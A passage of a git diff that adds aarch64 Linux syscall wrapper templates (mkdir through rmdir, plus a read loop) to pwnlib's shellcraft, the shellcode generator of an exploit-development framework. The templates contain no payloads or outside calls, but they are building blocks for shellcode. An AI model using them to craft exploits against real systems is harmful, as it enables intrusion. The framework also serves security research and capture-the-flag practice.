pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, path, mode"/> +<%docstring> +Invokes the syscall mkdirat. See 'man 2 mkdirat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + + + ${syscall('SYS_mkdirat', fd, path, mode)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mknod.asm b/pwnlib/shellcraft/templates/aarch64/linux/mknod.asm new file mode 100644 index 000000000..7b0f0a281 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mknod.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path, mode, dev"/> +<%docstring> +Invokes the syscall mknod. See 'man 2 mknod' for more information. + +Arguments: + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknod', path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mknodat.asm b/pwnlib/shellcraft/templates/aarch64/linux/mknodat.asm new file mode 100644 index 000000000..d15befe0f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mknodat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, path, mode, dev"/> +<%docstring> +Invokes the syscall mknodat. See 'man 2 mknodat' for more information. + +Arguments: + fd(int): fd + path(char): path + mode(mode_t): mode + dev(dev_t): dev + + + ${syscall('SYS_mknodat', fd, path, mode, dev)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mlock.asm b/pwnlib/shellcraft/templates/aarch64/linux/mlock.asm new file mode 100644 index 000000000..c984ece44 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall mlock. See 'man 2 mlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_mlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mlockall.asm b/pwnlib/shellcraft/templates/aarch64/linux/mlockall.asm new file mode 100644 index 000000000..d498a4963 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="flags"/> +<%docstring> +Invokes the syscall mlockall. See 'man 2 mlockall' for more information. + +Arguments: + flags(int): flags + + + ${syscall('SYS_mlockall', flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mmap.asm b/pwnlib/shellcraft/templates/aarch64/linux/mmap.asm new file mode 100644 index 000000000..97e183a03 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mmap.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, length, prot, flags, fd, offset"/> +<%docstring> +Invokes the syscall mmap. See 'man 2 mmap' for more information. + +Arguments: + addr(void): addr + length(size_t): length + prot(int): prot + flags(int): flags + fd(int): fd + offset(off_t): offset + + + ${syscall('SYS_mmap', addr, length, prot, flags, fd, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mprotect.asm b/pwnlib/shellcraft/templates/aarch64/linux/mprotect.asm new file mode 100644 index 000000000..31a544eb2 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mprotect.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len, prot"/> +<%docstring> +Invokes the syscall mprotect. See 'man 2 mprotect' for more information. + +Arguments: + addr(void): addr + len(size_t): len + prot(int): prot + + + ${syscall('SYS_mprotect', addr, len, prot)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_notify.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_notify.asm new file mode 100644 index 000000000..73aab0ca3 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_notify.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="mqdes, notification"/> +<%docstring> +Invokes the syscall mq_notify. See 'man 2 mq_notify' for more information. + +Arguments: + mqdes(mqd_t): mqdes + notification(sigevent): notification + + + ${syscall('SYS_mq_notify', mqdes, notification)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_open.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_open.asm new file mode 100644 index 000000000..907c38215 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name, oflag, vararg"/> +<%docstring> +Invokes the syscall mq_open. See 'man 2 mq_open' for more information. + +Arguments: + name(char): name + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_mq_open', name, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_timedreceive.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_timedreceive.asm new file mode 100644 index 000000000..c21cf1936 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_timedreceive.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedreceive. See 'man 2 mq_timedreceive' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedreceive', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_timedsend.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_timedsend.asm new file mode 100644 index 000000000..5e7f1cacf --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_timedsend.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="mqdes, msg_ptr, msg_len, msg_prio, abs_timeout"/> +<%docstring> +Invokes the syscall mq_timedsend. See 'man 2 mq_timedsend' for more information. + +Arguments: + mqdes(mqd_t): mqdes + msg_ptr(char): msg_ptr + msg_len(size_t): msg_len + msg_prio(unsigned): msg_prio + abs_timeout(timespec): abs_timeout + + + ${syscall('SYS_mq_timedsend', mqdes, msg_ptr, msg_len, msg_prio, abs_timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mq_unlink.asm b/pwnlib/shellcraft/templates/aarch64/linux/mq_unlink.asm new file mode 100644 index 000000000..e750a540f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mq_unlink.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="name"/> +<%docstring> +Invokes the syscall mq_unlink. See 'man 2 mq_unlink' for more information. + +Arguments: + name(char): name + + + ${syscall('SYS_mq_unlink', name)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/mremap.asm b/pwnlib/shellcraft/templates/aarch64/linux/mremap.asm new file mode 100644 index 000000000..01c8abc26 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/mremap.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, old_len, new_len, flags, vararg"/> +<%docstring> +Invokes the syscall mremap. See 'man 2 mremap' for more information. + +Arguments: + addr(void): addr + old_len(size_t): old_len + new_len(size_t): new_len + flags(int): flags + vararg(int): vararg + + + ${syscall('SYS_mremap', addr, old_len, new_len, flags, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/msync.asm b/pwnlib/shellcraft/templates/aarch64/linux/msync.asm new file mode 100644 index 000000000..2906d3241 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/msync.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len, flags"/> +<%docstring> +Invokes the syscall msync. See 'man 2 msync' for more information. + +Arguments: + addr(void): addr + len(size_t): len + flags(int): flags + + + ${syscall('SYS_msync', addr, len, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/munlock.asm b/pwnlib/shellcraft/templates/aarch64/linux/munlock.asm new file mode 100644 index 000000000..9fd8f70a4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/munlock.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munlock. See 'man 2 munlock' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munlock', addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/munlockall.asm b/pwnlib/shellcraft/templates/aarch64/linux/munlockall.asm new file mode 100644 index 000000000..d5164dcbc --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/munlockall.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall munlockall. See 'man 2 munlockall' for more information. + +Arguments: + + + + ${syscall('SYS_munlockall')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/munmap.asm b/pwnlib/shellcraft/templates/aarch64/linux/munmap.asm new file mode 100644 index 000000000..b3b2553f3 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/munmap.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="addr, len"/> +<%docstring> +Invokes the syscall munmap. See 'man 2 munmap' for more information. + +Arguments: + addr(void): addr + len(size_t): len + + + ${syscall('SYS_munmap', addr, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/nanosleep.asm b/pwnlib/shellcraft/templates/aarch64/linux/nanosleep.asm new file mode 100644 index 000000000..fcb9f293c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/nanosleep.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="requested_time, remaining"/> +<%docstring> +Invokes the syscall nanosleep. See 'man 2 nanosleep' for more information. + +Arguments: + requested_time(timespec): requested_time + remaining(timespec): remaining + + + ${syscall('SYS_nanosleep', requested_time, remaining)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/nice.asm b/pwnlib/shellcraft/templates/aarch64/linux/nice.asm new file mode 100644 index 000000000..283f6ff5e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/nice.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="inc"/> +<%docstring> +Invokes the syscall nice. See 'man 2 nice' for more information. + +Arguments: + inc(int): inc + + + ${syscall('SYS_nice', inc)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/open.asm b/pwnlib/shellcraft/templates/aarch64/linux/open.asm new file mode 100644 index 000000000..c80d005ef --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/open.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="file, oflag, vararg"/> +<%docstring> +Invokes the syscall open. See 'man 2 open' for more information. + +Arguments: + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_open', file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/openat.asm b/pwnlib/shellcraft/templates/aarch64/linux/openat.asm new file mode 100644 index 000000000..6f7cb20ce --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/openat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, file, oflag, vararg"/> +<%docstring> +Invokes the syscall openat. See 'man 2 openat' for more information. + +Arguments: + fd(int): fd + file(char): file + oflag(int): oflag + vararg(int): vararg + + + ${syscall('SYS_openat', fd, file, oflag, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pause.asm b/pwnlib/shellcraft/templates/aarch64/linux/pause.asm new file mode 100644 index 000000000..7f4e4d99a --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pause.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall pause. See 'man 2 pause' for more information. + +Arguments: + + + + ${syscall('SYS_pause')} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pipe.asm b/pwnlib/shellcraft/templates/aarch64/linux/pipe.asm new file mode 100644 index 000000000..7ee9244d9 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pipe.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pipedes"/> +<%docstring> +Invokes the syscall pipe. See 'man 2 pipe' for more information. + +Arguments: + pipedes(int): pipedes + + + ${syscall('SYS_pipe', pipedes)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pipe2.asm b/pwnlib/shellcraft/templates/aarch64/linux/pipe2.asm new file mode 100644 index 000000000..000e9d4ac --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pipe2.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pipedes, flags"/> +<%docstring> +Invokes the syscall pipe2. See 'man 2 pipe2' for more information. + +Arguments: + pipedes(int): pipedes + flags(int): flags + + + ${syscall('SYS_pipe2', pipedes, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/poll.asm b/pwnlib/shellcraft/templates/aarch64/linux/poll.asm new file mode 100644 index 000000000..9b7137e77 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/poll.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fds, nfds, timeout"/> +<%docstring> +Invokes the syscall poll. See 'man 2 poll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(int): timeout + + + ${syscall('SYS_poll', fds, nfds, timeout)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ppoll.asm b/pwnlib/shellcraft/templates/aarch64/linux/ppoll.asm new file mode 100644 index 000000000..81dc1d07c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ppoll.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fds, nfds, timeout, ss"/> +<%docstring> +Invokes the syscall ppoll. See 'man 2 ppoll' for more information. + +Arguments: + fds(pollfd): fds + nfds(nfds_t): nfds + timeout(timespec): timeout + ss(sigset_t): ss + + + ${syscall('SYS_ppoll', fds, nfds, timeout, ss)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/prctl.asm b/pwnlib/shellcraft/templates/aarch64/linux/prctl.asm new file mode 100644 index 000000000..1f5287832 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/prctl.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="option, vararg"/> +<%docstring> +Invokes the syscall prctl. See 'man 2 prctl' for more information. + +Arguments: + option(int): option + vararg(int): vararg + + + ${syscall('SYS_prctl', option, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pread.asm b/pwnlib/shellcraft/templates/aarch64/linux/pread.asm new file mode 100644 index 000000000..585463371 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pread.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, nbytes, offset"/> +<%docstring> +Invokes the syscall pread. See 'man 2 pread' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + offset(off_t): offset + + + ${syscall('SYS_pread', fd, buf, nbytes, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/preadv.asm b/pwnlib/shellcraft/templates/aarch64/linux/preadv.asm new file mode 100644 index 000000000..15b2ad4f5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/preadv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall preadv. See 'man 2 preadv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_preadv', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/prlimit64.asm b/pwnlib/shellcraft/templates/aarch64/linux/prlimit64.asm new file mode 100644 index 000000000..87e295a14 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/prlimit64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="pid, resource, new_limit, old_limit"/> +<%docstring> +Invokes the syscall prlimit64. See 'man 2 prlimit64' for more information. + +Arguments: + pid(pid_t): pid + resource(rlimit_resource): resource + new_limit(rlimit64): new_limit + old_limit(rlimit64): old_limit + + + ${syscall('SYS_prlimit64', pid, resource, new_limit, old_limit)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/profil.asm b/pwnlib/shellcraft/templates/aarch64/linux/profil.asm new file mode 100644 index 000000000..4e199cd0f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/profil.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="sample_buffer, size, offset, scale"/> +<%docstring> +Invokes the syscall profil. See 'man 2 profil' for more information. + +Arguments: + sample_buffer(unsigned): sample_buffer + size(size_t): size + offset(size_t): offset + scale(unsigned): scale + + + ${syscall('SYS_profil', sample_buffer, size, offset, scale)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/ptrace.asm b/pwnlib/shellcraft/templates/aarch64/linux/ptrace.asm new file mode 100644 index 000000000..b8999ac7f --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/ptrace.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="request, vararg"/> +<%docstring> +Invokes the syscall ptrace. See 'man 2 ptrace' for more information. + +Arguments: + request(ptrace_request): request + vararg(int): vararg + + + ${syscall('SYS_ptrace', request, vararg)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/putpmsg.asm b/pwnlib/shellcraft/templates/aarch64/linux/putpmsg.asm new file mode 100644 index 000000000..7278444a4 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/putpmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fildes, ctlptr, dataptr, band, flags"/> +<%docstring> +Invokes the syscall putpmsg. See 'man 2 putpmsg' for more information. + +Arguments: + fildes(int): fildes + ctlptr(strbuf): ctlptr + dataptr(strbuf): dataptr + band(int): band + flags(int): flags + + + ${syscall('SYS_putpmsg', fildes, ctlptr, dataptr, band, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pwrite.asm b/pwnlib/shellcraft/templates/aarch64/linux/pwrite.asm new file mode 100644 index 000000000..4b29a3bca --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pwrite.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, n, offset"/> +<%docstring> +Invokes the syscall pwrite. See 'man 2 pwrite' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + offset(off_t): offset + + + ${syscall('SYS_pwrite', fd, buf, n, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/pwritev.asm b/pwnlib/shellcraft/templates/aarch64/linux/pwritev.asm new file mode 100644 index 000000000..68791c21c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/pwritev.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, iovec, count, offset"/> +<%docstring> +Invokes the syscall pwritev. See 'man 2 pwritev' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + offset(off_t): offset + + + ${syscall('SYS_pwritev', fd, iovec, count, offset)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/read.asm b/pwnlib/shellcraft/templates/aarch64/linux/read.asm new file mode 100644 index 000000000..810091c5e --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/read.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Invokes the syscall read. See 'man 2 read' for more information. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + + + ${syscall('SYS_read', fd, buf, nbytes)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readahead.asm b/pwnlib/shellcraft/templates/aarch64/linux/readahead.asm new file mode 100644 index 000000000..47af56a5b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readahead.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, offset, count"/> +<%docstring> +Invokes the syscall readahead. See 'man 2 readahead' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_readahead', fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/readdir.asm new file mode 100644 index 000000000..6ccfa6d5d --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="dirp"/> +<%docstring> +Invokes the syscall readdir. See 'man 2 readdir' for more information. + +Arguments: + dirp(DIR): dirp + + + ${syscall('SYS_readdir', dirp)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readlink.asm b/pwnlib/shellcraft/templates/aarch64/linux/readlink.asm new file mode 100644 index 000000000..6f2b75e3c --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readlink.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path, buf, len"/> +<%docstring> +Invokes the syscall readlink. See 'man 2 readlink' for more information. + +Arguments: + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlink', path, buf, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readlinkat.asm b/pwnlib/shellcraft/templates/aarch64/linux/readlinkat.asm new file mode 100644 index 000000000..2ef56ada7 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readlinkat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, path, buf, len"/> +<%docstring> +Invokes the syscall readlinkat. See 'man 2 readlinkat' for more information. + +Arguments: + fd(int): fd + path(char): path + buf(char): buf + len(size_t): len + + + ${syscall('SYS_readlinkat', fd, path, buf, len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readn.asm b/pwnlib/shellcraft/templates/aarch64/linux/readn.asm new file mode 100644 index 000000000..d68e270de --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readn.asm @@ -0,0 +1,23 @@ +<% + from pwnlib.shellcraft.aarch64.linux import read + from pwnlib.shellcraft.aarch64 import setregs + from pwnlib.shellcraft import common +%> +<%page args="fd, buf, nbytes"/> +<%docstring> +Reads exactly nbytes bytes from file descriptor fd into the buffer buf. + +Arguments: + fd(int): fd + buf(void): buf + nbytes(size_t): nbytes + +<% +readn_loop = common.label('readn_loop') +%> + ${setregs({'x3': buf, 'x4': nbytes})} +${readn_loop}: + ${read(fd, 'x3', 'x4')} + add x3, x3, x0 + subs x4, x4, x0 + bne ${readn_loop} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/readv.asm b/pwnlib/shellcraft/templates/aarch64/linux/readv.asm new file mode 100644 index 000000000..f8b4cfdfe --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/readv.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, iovec, count"/> +<%docstring> +Invokes the syscall readv. See 'man 2 readv' for more information. + +Arguments: + fd(int): fd + iovec(iovec): iovec + count(int): count + + + ${syscall('SYS_readv', fd, iovec, count)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/recv.asm b/pwnlib/shellcraft/templates/aarch64/linux/recv.asm new file mode 100644 index 000000000..a79f5bca8 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/recv.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, n, flags"/> +<%docstring> +Invokes the syscall recv. See 'man 2 recv' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + + + ${syscall('SYS_recv', fd, buf, n, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/recvfrom.asm b/pwnlib/shellcraft/templates/aarch64/linux/recvfrom.asm new file mode 100644 index 000000000..3f2d12f85 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/recvfrom.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, buf, n, flags, addr, addr_len"/> +<%docstring> +Invokes the syscall recvfrom. See 'man 2 recvfrom' for more information. + +Arguments: + fd(int): fd + buf(void): buf + n(size_t): n + flags(int): flags + addr(SOCKADDR_ARG): addr + addr_len(socklen_t): addr_len + + + ${syscall('SYS_recvfrom', fd, buf, n, flags, addr, addr_len)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/recvmmsg.asm b/pwnlib/shellcraft/templates/aarch64/linux/recvmmsg.asm new file mode 100644 index 000000000..9ebf14a94 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/recvmmsg.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, vmessages, vlen, flags, tmo"/> +<%docstring> +Invokes the syscall recvmmsg. See 'man 2 recvmmsg' for more information. + +Arguments: + fd(int): fd + vmessages(mmsghdr): vmessages + vlen(unsigned): vlen + flags(int): flags + tmo(timespec): tmo + + + ${syscall('SYS_recvmmsg', fd, vmessages, vlen, flags, tmo)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/recvmsg.asm b/pwnlib/shellcraft/templates/aarch64/linux/recvmsg.asm new file mode 100644 index 000000000..ae86d2d20 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/recvmsg.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="fd, message, flags"/> +<%docstring> +Invokes the syscall recvmsg. See 'man 2 recvmsg' for more information. + +Arguments: + fd(int): fd + message(msghdr): message + flags(int): flags + + + ${syscall('SYS_recvmsg', fd, message, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/remap_file_pages.asm b/pwnlib/shellcraft/templates/aarch64/linux/remap_file_pages.asm new file mode 100644 index 000000000..608c5324b --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/remap_file_pages.asm @@ -0,0 +1,17 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="start, size, prot, pgoff, flags"/> +<%docstring> +Invokes the syscall remap_file_pages. See 'man 2 remap_file_pages' for more information. + +Arguments: + start(void): start + size(size_t): size + prot(int): prot + pgoff(size_t): pgoff + flags(int): flags + + + ${syscall('SYS_remap_file_pages', start, size, prot, pgoff, flags)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/rename.asm b/pwnlib/shellcraft/templates/aarch64/linux/rename.asm new file mode 100644 index 000000000..807a26986 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/rename.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="old, new"/> +<%docstring> +Invokes the syscall rename. See 'man 2 rename' for more information. + +Arguments: + old(char): old + new(char): new + + + ${syscall('SYS_rename', old, new)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/renameat.asm b/pwnlib/shellcraft/templates/aarch64/linux/renameat.asm new file mode 100644 index 000000000..ea6874ce5 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/renameat.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="oldfd, old, newfd, new"/> +<%docstring> +Invokes the syscall renameat. See 'man 2 renameat' for more information. + +Arguments: + oldfd(int): oldfd + old(char): old + newfd(int): newfd + new(char): new + + + ${syscall('SYS_renameat', oldfd, old, newfd, new)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/rmdir.asm b/pwnlib/shellcraft/templates/aarch64/linux/rmdir.asm new file mode 100644 index 000000000..4fd59e542 --- /dev/null +++ b/pwnlib/shellcraft/templates/aarch64/linux/rmdir.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.aarch64.linux import syscall +%> +<%page args="path"/> +<%docstring> +Invokes the syscall rmdir. See 'man 2 rmdir' for more information. + +Arguments: + path(char): path + + + ${syscall('SYS_rmdir', path)} diff --git a/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_max.asm b/pwnlib/shellcraft/templates/aarch64/linux/sched_get_priority_max.asm new file mode 100644 index 000000000..b884b9c3e --- 